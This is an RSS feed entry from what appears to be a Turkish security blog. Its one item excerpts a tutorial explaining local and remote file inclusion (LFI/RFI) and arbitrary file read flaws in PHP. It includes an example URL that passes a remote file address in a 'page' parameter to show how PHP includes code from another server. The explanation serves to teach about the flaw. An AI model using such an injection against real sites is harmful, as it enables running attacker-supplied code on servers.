<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>File Inclusion on diaryofinjector</title><link>https://diaryofinjector.com/tags/file-inclusion/</link><description>Recent content in File Inclusion on diaryofinjector</description><generator>Hugo</generator><language>en</language><lastBuildDate>Tue, 18 Nov 2014 00:00:00 +0000</lastBuildDate><atom:link href="https://diaryofinjector.com/tags/file-inclusion/index.xml" rel="self" type="application/rss+xml"/><item><title>LFI/RFI ve Arbitrary File Read Açıkları</title><link>https://diaryofinjector.com/posts/lfi-rfi-arbitrary-file-read/</link><pubDate>Tue, 18 Nov 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/lfi-rfi-arbitrary-file-read/</guid><description>&lt;h3 id="lfirfi-ve-arbitrary-file-read-açıkları">LFI/RFI ve Arbitrary File Read Açıkları&lt;/h3>
&lt;p>Bu tür açıklar her script dilinde görülebilir fakat en yaygın olarak görülen &amp;ldquo;php&amp;rdquo; dir. Biz örneklerimizi &amp;ldquo;php&amp;rdquo; dilinde vereceğiz. Zaten kullanım bakımından her dilde aynı yöntemler izlenmektedir. &lt;strong>LFI&lt;/strong> &amp;ldquo;&lt;strong>local file include&lt;/strong>&amp;rdquo; yani &amp;ldquo;&lt;strong>yerel dosya çağırma&lt;/strong>&amp;rdquo; manasına gelmekte. &lt;strong>RFI&lt;/strong> (&lt;strong>remote file include&lt;/strong>) ise aynı işin yerel dosya değil uzak server&amp;rsquo;daki bir dosyayı çağırarak yapılanı.&lt;/p>
&lt;p>&lt;strong>Php&lt;/strong> &amp;ldquo;&lt;strong>wrapper&lt;/strong>&amp;rdquo; özelliği ile örneğin: &amp;ldquo;&lt;code>http://site.com/index.php?page=http://asd.com/x.txt&lt;/code>&amp;rdquo; şeklinde bir include yapmaya çalıştığınızda, php bu dosyanın bir &amp;ldquo;&lt;strong>url&lt;/strong>&amp;rdquo; olduğunu algılar ve url üzerinden dosyayı include eder.&lt;/p></description></item></channel></rss>